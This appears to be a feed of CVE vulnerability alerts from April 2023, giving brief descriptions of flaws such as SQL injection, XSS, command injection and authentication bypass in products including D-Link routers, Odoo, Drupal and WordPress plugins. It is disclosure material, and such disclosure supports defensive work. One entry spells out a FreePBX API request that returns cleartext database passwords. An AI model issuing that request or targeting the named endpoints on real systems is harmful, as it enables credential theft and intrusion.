🚨 CVE-2023-27733DedeCMS v5.7.106 was discovered to contain a SQL injection vulnerability via the component /dede/sys_sql_query.php.🎖@cveNotify |
|
| 2023-04-26 22:59:06 |
🚨 CVE-2023-27755go-bbs v1 was discovered to contain an arbitrary file download vulnerability via the component /api/v1/download.🎖@cveNotify |
|
| 2023-04-26 22:59:03 |
🚨 CVE-2023-1473The Slider, Gallery, and Carousel by MetaSlider WordPress plugin 3.29.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-04-26 22:59:02 |
🚨 CVE-2020-36070Insecure Permission vulnerability found in Yoyager v.1.4 and before allows a remote attacker to execute arbitrary code via a crafted .php file to the media component.🎖@cveNotify |
|
| 2023-04-26 22:59:01 |
🚨 CVE-2023-26567Sangoma FreePBX 1805 through 2302 (when obtained as a ,.ISO file) places AMPDBUSER, AMPDBPASS, AMPMGRUSER, and AMPMGRPASS in the list of global variables. This exposes cleartext authentication credentials for the Asterisk Database (MariaDB/MySQL) and Asterisk Manager Interface. For example, an attacker can make a /ari/asterisk/variable?variable=AMPDBPASS API call.🎖@cveNotify |
|
| 2023-04-26 22:59:00 |
🚨 CVE-2023-27559IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash when using a specially crafted subquery. IBM X-Force ID: 249196.🎖@cveNotify |
|
| 2023-04-26 20:58:25 |
🚨 CVE-2023-0127A command injection vulnerability in the firmware_update command, in the device's restricted telnet interface, allows an authenticated attacker to execute arbitrary commands as root.🎖@cveNotify |
|
| 2023-04-26 20:58:24 |
🚨 CVE-2021-34862This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2020 1.01rc001 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the var:menu parameter provided to the webproc endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13270.🎖@cveNotify |
|
| 2023-04-26 20:58:23 |
🚨 CVE-2021-34863This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2020 1.01rc001 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the var:page parameter provided to the webproc endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13271.🎖@cveNotify |
|
| 2023-04-26 20:58:19 |
🚨 CVE-2021-41503** UNSUPPORTED WHEN ASSIGNED ** DCS-5000L v1.05 and DCS-932L v2.17 and older are affecged by Incorrect Acess Control. The use of the basic authentication for the devices command interface allows attack vectors that may compromise the cameras configuration and allow malicious users on the LAN to access the device. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-04-26 20:58:18 |
🚨 CVE-2020-24581An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. It contains an execute_cmd.cgi feature (that is not reachable via the web user interface) that lets an authenticated user execute Operating System commands.🎖@cveNotify |
|
| 2023-04-26 20:58:17 |
🚨 CVE-2020-24578An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. It has a misconfigured FTP service that allows a malicious network user to access system folders and download sensitive files (such as the password hash file).🎖@cveNotify |
|
| 2023-04-26 20:58:14 |
🚨 CVE-2020-24579An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.🎖@cveNotify |
|
| 2023-04-26 20:58:13 |
🚨 CVE-2020-26567An issue was discovered on D-Link DSR-250N before 3.17B devices. The CGI script upgradeStatusReboot.cgi can be accessed without authentication. Any access reboots the device, rendering it therefore unusable for several minutes.🎖@cveNotify |
|
| 2023-04-26 20:58:12 |
🚨 CVE-2020-9535fmwlan.c on D-Link DIR-615Jx10 devices has a stack-based buffer overflow via the formWlanSetup_Wizard webpage parameter when f_radius_ip1 is malformed.🎖@cveNotify |
|
| 2023-04-26 18:58:25 |
🚨 CVE-2022-25276The Media oEmbed iframe route does not properly validate the iframe domain setting, which allows embeds to be displayed in the context of the primary domain. Under certain circumstances, this could lead to cross-site scripting, leaked cookies, or other vulnerabilities.🎖@cveNotify |
|
| 2023-04-26 18:58:24 |
🚨 CVE-2022-25277Drupal core sanitizes filenames with dangerous extensions upon upload (reference: SA-CORE-2020-012) and strips leading and trailing dots from filenames to prevent uploading server configuration files (reference: SA-CORE-2019-010). However, the protections for these two vulnerabilities previously did not work correctly together. As a result, if the site were configured to allow the upload of files with an htaccess extension, these files' filenames would not be properly sanitized. This could allow bypassing the protections provided by Drupal core's default .htaccess files and possible remote code execution on Apache web servers. This issue is mitigated by the fact that it requires a field administrator to explicitly configure a file field to allow htaccess as an extension (a restricted permission), or a contributed module or custom code that overrides allowed file uploads.🎖@cveNotify |
|
| 2023-04-26 18:58:23 |
🚨 CVE-2022-25278Under certain circumstances, the Drupal core form API evaluates form element access incorrectly. This may lead to a user being able to alter data they should not have access to. No forms provided by Drupal core are known to be vulnerable. However, forms added through contributed or custom modules or themes may be affected.🎖@cveNotify |
|
| 2023-04-26 18:58:22 |
🚨 CVE-2023-22729Silverstripe Framework is the Model-View-Controller framework that powers the Silverstripe content management system. Prior to version 4.12.15, an attacker can display a link to a third party website on a login screen by convincing a legitimate content author to follow a specially crafted link. Users should upgrade to Silverstripe Framework 4.12.15 or above to address the issue.🎖@cveNotify |
|
| 2023-04-26 18:58:21 |
🚨 CVE-2023-24796Password vulnerability found in Vinga WR-AC1200 81.102.1.4370 and before allows a remote attacker to execute arbitrary code via the password parameter at the /goform/sysTools and /adm/systools.asp endpoints.🎖@cveNotify |
|
| 2023-04-26 18:58:17 |
🚨 CVE-2023-29257IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to remote code execution as a database administrator of one database may execute code or read/write files from another database within the same instance. IBM X-Force ID: 252011.🎖@cveNotify |
|
| 2023-04-26 18:58:16 |
🚨 CVE-2023-29506XWiki Commons are technical libraries common to several other top level XWiki projects. It was possible to inject some code using the URL of authenticated endpoints. This problem has been patched on XWiki 13.10.11, 14.4.7 and 14.10.🎖@cveNotify |
|
| 2023-04-26 18:58:15 |
🚨 CVE-2022-45907In PyTorch before trunk/89695, torch.jit.annotations.parse_type_line can cause arbitrary code execution because eval is used unsafely.🎖@cveNotify |
|
| 2023-04-26 18:58:14 |
🚨 CVE-2023-27350This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.🎖@cveNotify |
|
| 2023-04-26 18:58:13 |
🚨 CVE-2023-29214XWiki Commons are technical libraries common to several other top level XWiki projects. Any user with edit rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the included pages in the IncludedDocuments panel. The problem has been patched on XWiki 14.4.7, and 14.10.🎖@cveNotify |
|
| 2023-04-26 17:58:15 |
🚨 CVE-2023-24796Password vulnerability found in Vinga WR-AC1200 81.102.1.4370 and before allows a remote attacker to execute arbitrary code via the password parameter at the /goform/sysTools and /adm/systools.asp endpoints.🎖@cveNotify |
|
| 2023-04-26 17:58:14 |
🚨 CVE-2023-22613An issue was discovered in IhisiSmm in Insyde InsydeH2O with kernel 5.0 through 5.5. It is possible to write to an attacker-controlled address. An attacker could invoke an SMI handler with a malformed pointer in RCX that overlaps SMRAM, resulting in SMM memory corruption.🎖@cveNotify |
|
| 2023-04-26 17:58:13 |
🚨 CVE-2023-22615An issue was discovered in IhisiSmm in Insyde InsydeH2O with kernel 5.0 through 5.5. IHISI subfunction execution may corrupt SMRAM. An attacker can pass an address in the RCX save state register that overlaps SMRAM, thereby coercing an IHISI subfunction handler to overwrite private SMRAM.🎖@cveNotify |
|
| 2023-04-26 14:58:17 |
🚨 CVE-2023-26286IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX runtime services library to execute arbitrary commands. IBM X-Force ID: 248421.🎖@cveNotify |
|
| 2023-04-26 14:58:16 |
🚨 CVE-2023-2294A vulnerability was found in UCMS 1.6.0. It has been classified as problematic. This affects an unknown part of the file saddpost.php of the component Column Configuration. The manipulation of the argument strorder leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227481 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-26 10:58:21 |
🚨 CVE-2023-2294A vulnerability was found in UCMS 1.6.0. It has been classified as problematic. This affects an unknown part of the file saddpost.php of the component Column Configuration. The manipulation of the argument strorder leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227481 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-26 06:58:43 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-26 06:58:42 |
🚨 CVE-2023-2134Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-26 06:58:41 |
🚨 CVE-2023-2136Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-26 06:58:40 |
🚨 CVE-2023-2137Heap buffer overflow in sqlite in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-26 06:58:36 |
🚨 CVE-2023-2004An integer overflow vulnerability was discovered in Freetype in tt_hvadvance_adjust() function in src/truetype/ttgxvar.c.🎖@cveNotify |
|
| 2023-04-26 06:58:35 |
🚨 CVE-2023-2033Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-26 06:58:34 |
🚨 CVE-2022-36769IBM Cloud Pak for Data 4.5 and 4.6 could allow a privileged user to upload malicious files of dangerous types that can be automatically processed within the product's environment. IBM X-Force ID: 232034.🎖@cveNotify |
|
| 2023-04-26 06:58:33 |
🚨 CVE-2022-41739IBM Spectrum Scale (IBM Spectrum Scale Container Native Storage Access 5.1.2.1 through 5.1.6.0) could allow programs running inside the container to overcome isolation mechanism and gain additional capabilities or access sensitive information on the host. IBM X-Force ID: 237815.🎖@cveNotify |
|
| 2023-04-26 06:58:29 |
🚨 CVE-2012-5873ARC (aka ARC2) through 2011-12-01 allows reflected XSS via the end_point.php query parameter in an output=htmltab action.🎖@cveNotify |
|
| 2023-04-26 06:58:28 |
🚨 CVE-2023-26560Northern.tech CFEngine Enterprise before 3.21.1 allows a subset of authenticated users to leverage the Scheduled Reports feature to read arbitrary files and potentially discover credentials.🎖@cveNotify |
|
| 2023-04-26 06:58:27 |
🚨 CVE-2023-27843SQL injection vulnerability found in PrestaShop askforaquote v.5.4.2 and before allow a remote attacker to gain privileges via the QuotesProduct::deleteProduct component.🎖@cveNotify |
|
| 2023-04-26 06:58:23 |
🚨 CVE-2023-30106Sourcecodester Medicine Tracker System in PHP 1.0.0 is vulnerable to Cross Site Scripting (XSS) via page=about.🎖@cveNotify |
|
| 2023-04-26 06:58:22 |
🚨 CVE-2023-30111Medicine Tracker System in PHP 1.0.0 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-04-26 06:58:21 |
🚨 CVE-2022-46763A SQL injection issue in a database stored function in TrueConf Server 5.2.0.10225 allows a low-privileged database user to execute arbitrary SQL commands as the database administrator, resulting in execution of arbitrary code.🎖@cveNotify |
|
| 2023-04-26 06:58:20 |
🚨 CVE-2022-46764A SQL injection issue in the web API in TrueConf Server 5.2.0.10225 allows remote unauthenticated attackers to execute arbitrary SQL commands, ultimately leading to remote code execution.🎖@cveNotify |
|
| 2023-04-25 22:58:22 |
🚨 CVE-2018-17449An issue was discovered in GitLab Community and Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. Remote attackers could obtain sensitive information about issues, comments, and project titles via events API insecure direct object reference.🎖@cveNotify |
|
| 2023-04-25 22:58:19 |
🚨 CVE-2018-17450An issue was discovered in GitLab Community and Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. There is Server-Side Request Forgery (SSRF) via the Kubernetes integration, leading (for example) to disclosure of a GCP service token.🎖@cveNotify |
|
| 2023-04-25 22:58:18 |
🚨 CVE-2018-17451An issue was discovered in GitLab Community and Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. There is Cross Site Request Forgery (CSRF) in the Slack integration for issuing slash commands.🎖@cveNotify |
|
| 2023-04-25 22:58:17 |
🚨 CVE-2023-2148A vulnerability classified as critical has been found in Campcodes Online Thesis Archiving System 1.0. This affects an unknown part of the file /admin/curriculum/view_curriculum.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-25 20:58:39 |
🚨 CVE-2023-0367The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-04-25 20:58:38 |
🚨 CVE-2023-0764The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not perform proper sanitization of gallery information, leading to a Stored Cross-Site Scription vulnerability. The attacker must have at least the privileges of the Author role.🎖@cveNotify |
|
| 2023-04-25 20:58:37 |
🚨 CVE-2023-1274The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks🎖@cveNotify |
|
| 2023-04-25 20:58:36 |
🚨 CVE-2023-0765The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not properly escape values used in SQL queries, leading to an Blind SQL Injection vulnerability. The attacker must have at least the privileges of an Author, and the vendor's Slider plugin (https://wordpress.org/plugins/slider-bws/) must also be installed for this vulnerability to be exploitable.🎖@cveNotify |
|
| 2023-04-25 20:58:34 |
🚨 CVE-2023-0889Themeflection Numbers WordPress plugin before 2.0.1 does not have authorisation and CSRF check in an AJAX action, and does not ensure that the options to be updated belong to the plugin. As a result, it could allow any authenticated users, such as subscriber, to update arbitrary blog options, such as enabling registration and set the default role to administrator🎖@cveNotify |
|
| 2023-04-25 20:58:33 |
🚨 CVE-2023-1723Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Veragroup Mobile Assistant allows SQL Injection.This issue affects Mobile Assistant: before 21.S.2343.🎖@cveNotify |
|
| 2023-04-25 20:58:32 |
🚨 CVE-2023-0277The WC Fields Factory WordPress plugin through 4.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-04-25 20:58:31 |
🚨 CVE-2019-14942An issue was discovered in GitLab Community and Enterprise Edition before 11.11.8, 12 before 12.0.6, and 12.1 before 12.1.6. Cookies for GitLab Pages (which have access control) could be sent over cleartext HTTP.🎖@cveNotify |
|
| 2023-04-25 20:58:30 |
🚨 CVE-2021-44460Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows users with deactivated accounts to access the system with the deactivated account and any permission it still holds, via crafted RPC requests.🎖@cveNotify |
|
| 2023-04-25 20:58:29 |
🚨 CVE-2021-44465Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows authenticated attackers to subscribe to receive future notifications and comments related to arbitrary business records in the system, via crafted RPC requests.🎖@cveNotify |
|
| 2023-04-25 20:58:28 |
🚨 CVE-2021-44547A sandboxing issue in Odoo Community 15.0 and Odoo Enterprise 15.0 allows authenticated administrators to executed arbitrary code, leading to privilege escalation.🎖@cveNotify |
|
| 2023-04-25 20:58:26 |
🚨 CVE-2021-23166A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read and write local files on the server.🎖@cveNotify |
|
| 2023-04-25 20:58:25 |
🚨 CVE-2021-44461Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0 through 15.0, allows remote attackers who are able to control the contents of accounting journal entries to inject arbitrary web script in the browser of a victim.🎖@cveNotify |
|
| 2023-04-25 20:58:24 |
🚨 CVE-2021-23176Improper access control in reporting engine of l10n_fr_fec module in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to extract accounting information via crafted RPC packets.🎖@cveNotify |
|
| 2023-04-25 20:58:22 |
🚨 CVE-2021-23178Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows attackers to validate online payments with a tokenized payment method that belongs to another user, causing the victim's payment method to be charged instead.🎖@cveNotify |
|
| 2023-04-25 20:58:21 |
🚨 CVE-2021-23186A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to access and modify database contents of other tenants, in a multi-tenant system.🎖@cveNotify |
|
| 2023-04-25 20:58:20 |
🚨 CVE-2021-23203Improper access control in reporting engine of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to download PDF reports for arbitrary documents, via crafted requests.🎖@cveNotify |
|
| 2023-04-25 20:58:19 |
🚨 CVE-2021-26263Cross-site scripting (XSS) issue in Discuss app of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents.🎖@cveNotify |
|
| 2023-04-25 20:58:18 |
🚨 CVE-2021-26947Cross-site scripting (XSS) issue Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, via a crafted link.🎖@cveNotify |
|
| 2023-04-25 20:58:17 |
🚨 CVE-2021-44476A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read local files on the server, including sensitive configuration files.🎖@cveNotify |
|
| 2023-04-25 16:58:39 |
🚨 CVE-2023-25348ChurchCRM 4.5.3 was discovered to contain a CSV injection vulnerability via the Last Name and First Name input fields when creating a new person. These vulnerabilities allow attackers to execute arbitrary code via a crafted excel file.🎖@cveNotify |
|
| 2023-04-25 16:58:38 |
🚨 CVE-2023-26057An XXE issue was discovered in Nokia NetAct before 22 FP2211 via an XML document to the Configuration Dashboard page. Input validation and a proper XML parser configuration are missing. For an external attacker, it is very difficult to exploit this, because a few dynamically created parameters such as Jsession-id, a CSRF token, and an Nxsrf token would be needed. The attack can realistically only be performed by an internal user.🎖@cveNotify |
|
| 2023-04-25 16:58:36 |
🚨 CVE-2023-26058An XXE issue was discovered in Nokia NetAct before 22 FP2211 via an XML document to a Performance Manager page. Input validation and a proper XML parser configuration are missing. For an external attacker, it is very difficult to exploit this, because a few dynamically created parameters such as Jsession-id, a CSRF token, and an Nxsrf token would be needed. The attack can realistically only be performed by an internal user.🎖@cveNotify |
|
| 2023-04-25 16:58:35 |
🚨 CVE-2023-26839A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to edit information for existing people on the site.🎖@cveNotify |
|
| 2023-04-25 16:58:33 |
🚨 CVE-2023-26840A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to set a person to a user and set that user to be an Administrator.🎖@cveNotify |
|
| 2023-04-25 16:58:32 |
🚨 CVE-2023-26841A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to change any user's password except for the user that is currently logged in.🎖@cveNotify |
|
| 2023-04-25 16:58:30 |
🚨 CVE-2023-26843A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.🎖@cveNotify |
|
| 2023-04-25 16:58:28 |
🚨 CVE-2023-30417A cross-site scripting (XSS) vulnerability in Pear-Admin-Boot up to v2.0.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title of a private message.🎖@cveNotify |
|
| 2023-04-25 16:58:27 |
🚨 CVE-2023-30459SmartPTT SCADA 1.1.0.0 allows remote code execution (when the attacker has administrator privileges) by writing a malicious C# script and executing it on the server (via server settings in the administrator control panel on port 8101, by default).🎖@cveNotify |
|
| 2023-04-25 16:58:26 |
🚨 CVE-2023-29850SENAYAN Library Management System (SLiMS) Bulian v9.5.2 does not strip exif data from uploaded images. This allows attackers to obtain information such as the user's geolocation and device information.🎖@cveNotify |
|
| 2023-04-25 16:58:25 |
🚨 CVE-2021-3800A flaw was found in glib before version 2.63.6. Due to random charset alias, pkexec can leak content from files owned by privileged users to unprivileged ones under the right condition.🎖@cveNotify |
|
| 2023-04-25 16:58:23 |
🚨 CVE-2014-3901Raritan Japan Dominion KX2-101 switches before 2 allow remote attackers to cause a denial of service (device hang) via a crafted packet.🎖@cveNotify |
|
| 2023-04-25 16:58:22 |
🚨 CVE-2018-0842Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an elevation of privilege vulnerability due to how objects in memory are handled, aka "Windows Kernel Elevation of Privilege Vulnerability".🎖@cveNotify |
|
| 2023-04-25 16:58:21 |
🚨 CVE-2018-9276An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.🎖@cveNotify |
|
| 2023-04-25 16:58:20 |
🚨 CVE-2023-26463strongSwan 5.9.8 and 5.9.9 potentially allows remote code execution because it uses a variable named "public" for two different purposes within the same function. There is initially incorrect access control, later followed by an expired pointer dereference. One attack vector is sending an untrusted client certificate during EAP-TLS. A server is affected only if it loads plugins that implement TLS-based EAP methods (EAP-TLS, EAP-TTLS, EAP-PEAP, or EAP-TNC). This is fixed in 5.9.10.🎖@cveNotify |
|
| 2023-04-25 16:58:18 |
🚨 CVE-2023-29199There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass `handleException()` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.16` of `vm2`.🎖@cveNotify |
|
| 2023-04-25 16:58:17 |
🚨 CVE-2023-29194Vitess is a database clustering system for horizontal scaling of MySQL. Users can either intentionally or inadvertently create a keyspace containing `/` characters such that from that point on, anyone who tries to view keyspaces from VTAdmin will receive an error. Trying to list all the keyspaces using `vtctldclient GetKeyspaces` will also return an error. Note that all other keyspaces can still be administered using the CLI (vtctldclient). This issue is fixed in version 16.0.1. As a workaround, delete the offending keyspace using a CLI client (vtctldclient).🎖@cveNotify |
|
| 2023-04-25 16:58:16 |
🚨 CVE-2023-29018The OpenFeature Operator allows users to expose feature flags to applications. Assuming the pre-existence of a vulnerability that allows for arbitrary code execution, an attacker could leverage the lax permissions configured on `open-feature-operator-controller-manager` to escalate the privileges of any SA in the cluster. The increased privileges could be used to modify cluster state, leading to DoS, or read sensitive data, including secrets. Version 0.2.32 mitigates this issue by restricting the resources the `open-feature-operator-controller-manager` can modify.🎖@cveNotify |
|
| 2023-04-25 16:58:14 |
🚨 CVE-2023-24509On affected modular platforms running Arista EOS equipped with both redundant supervisor modules and having the redundancy protocol configured with RPR or SSO, an existing unprivileged user can login to the standby supervisor as a root user, leading to a privilege escalation. Valid user credentials are required in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-04-25 16:58:13 |
🚨 CVE-2023-29529matrix-js-sdk is the Matrix Client-Server SDK for JavaScript and TypeScript. An attacker present in a room where an MSC3401 group call is taking place can eavesdrop on the video and audio of participants using matrix-js-sdk, without their knowledge. To affected matrix-js-sdk users, the attacker will not appear to be participating in the call. This attack is possible because matrix-js-sdk's group call implementation accepts incoming direct calls from other users, even if they have not yet declared intent to participate in the group call, as a means of resolving a race condition in call setup. Affected versions do not restrict access to the user's outbound media in this case. Legacy 1:1 calls are unaffected. This is fixed in matrix-js-sdk 24.1.0. As a workaround, users may hold group calls in private rooms where only the exact users who are expected to participate in the call are present.🎖@cveNotify |
|
| 2023-04-25 14:58:11 |
🚨 CVE-2023-26098An issue was discovered in the Open Document feature in Telindus Apsal 3.14.2022.235 b. An attacker may upload a crafted file to execute arbitrary code.🎖@cveNotify |
|
| 2023-04-25 10:58:13 |
🚨 CVE-2023-22665There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.🎖@cveNotify |
|
| 2023-04-25 06:58:13 |
🚨 CVE-2023-25690Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like:RewriteEngine onRewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]ProxyPassReverse /here/ http://example.com:8080/Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.🎖@cveNotify |
|
| 2023-04-25 06:58:12 |
🚨 CVE-2023-27522HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.55.Special characters in the origin response header can truncate/split the response forwarded to the client.🎖@cveNotify |
|
| 2023-04-25 00:58:18 |
🚨 CVE-2023-30406Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component ecma_find_named_property at /base/ecma-helpers.c.🎖@cveNotify |
|
| 2023-04-25 00:58:17 |
🚨 CVE-2023-30408Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component build/bin/jerry.🎖@cveNotify |
|
| 2023-04-25 00:58:14 |
🚨 CVE-2023-30410Jerryscript commit 1a2c047 was discovered to contain a stack overflow via the component ecma_op_function_construct at /operations/ecma-function-object.c.🎖@cveNotify |
|
| 2023-04-25 00:58:13 |
🚨 CVE-2023-30623`embano1/wip` is a GitHub Action written in Bash. Prior to version 2, the `embano1/wip` action uses the `github.event.pull_request.title` parameter in an insecure way. The title parameter is used in a run statement - resulting in a command injection vulnerability due to string interpolation. This vulnerability can be triggered by any user on GitHub. They just need to create a pull request with a commit message containing an exploit. (Note that first-time PR requests will not be run - but the attacker can submit a valid PR before submitting an invalid PR). The commit can be genuine, but the commit message can be malicious. This can be used to execute code on the GitHub runners and can be used to exfiltrate any secrets used in the CI pipeline, including repository tokens. Version 2 has a fix for this issue.🎖@cveNotify |
|
| 2023-04-25 00:58:12 |
🚨 CVE-2023-30629Vyper is a Pythonic Smart Contract Language for the ethereum virtual machine. In versions 0.3.1 through 0.3.7, the Vyper compiler generates the wrong bytecode. Any contract that uses the `raw_call` with `revert_on_failure=False` and `max_outsize=0` receives the wrong response from `raw_call`. Depending on the memory garbage, the result can be either `True` or `False`. A patch is available and, as of time of publication, anticipated to be part of Vyper 0.3.8. As a workaround, one may always put `max_outsize>0`.🎖@cveNotify |
|
| 2023-04-24 22:58:25 |
🚨 CVE-2022-28354In the Active Threads Plugin 1.3.0 for MyBB, the activethreads.php date parameter is vulnerable to XSS when setting a time period.🎖@cveNotify |
|
| 2023-04-24 22:58:24 |
🚨 CVE-2023-29469An issue was discovered in libxml2 before 2.10.4. When hashing empty dict strings in a crafted XML document, xmlDictComputeFastKey in dict.c can produce non-deterministic values, leading to various logic and memory errors, such as a double free. This behavior occurs because there is an attempt to use the first byte of an empty string, and any value is possible (not solely the '\0' value).🎖@cveNotify |
|
| 2023-04-24 22:58:23 |
🚨 CVE-2023-2019A flaw was found in the Linux kernel's netdevsim device driver, within the scheduling of events. This issue results from the improper management of a reference count. This may allow an attacker to create a denial of service condition on the system.🎖@cveNotify |
|
| 2023-04-24 22:58:19 |
🚨 CVE-2023-2258Improper Neutralization of Formula Elements in a CSV File in GitHub repository alfio-event/alf.io prior to 2.0-M4-2304.🎖@cveNotify |
|
| 2023-04-24 22:58:18 |
🚨 CVE-2023-2260Improper Authorization of Index Containing Sensitive Information in GitHub repository alfio-event/alf.io prior to 2.0-M4-2304.🎖@cveNotify |
|
| 2023-04-24 22:58:17 |
🚨 CVE-2023-30626Jellyfin is a free-software media system. Versions starting with 10.8.0 and prior to 10.8.10 and prior have a directory traversal vulnerability inside the `ClientLogController`, specifically `/ClientLog/Document`. When combined with a cross-site scripting vulnerability (CVE-2023-30627), this can result in file write and arbitrary code execution. Version 10.8.10 has a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-04-24 22:58:14 |
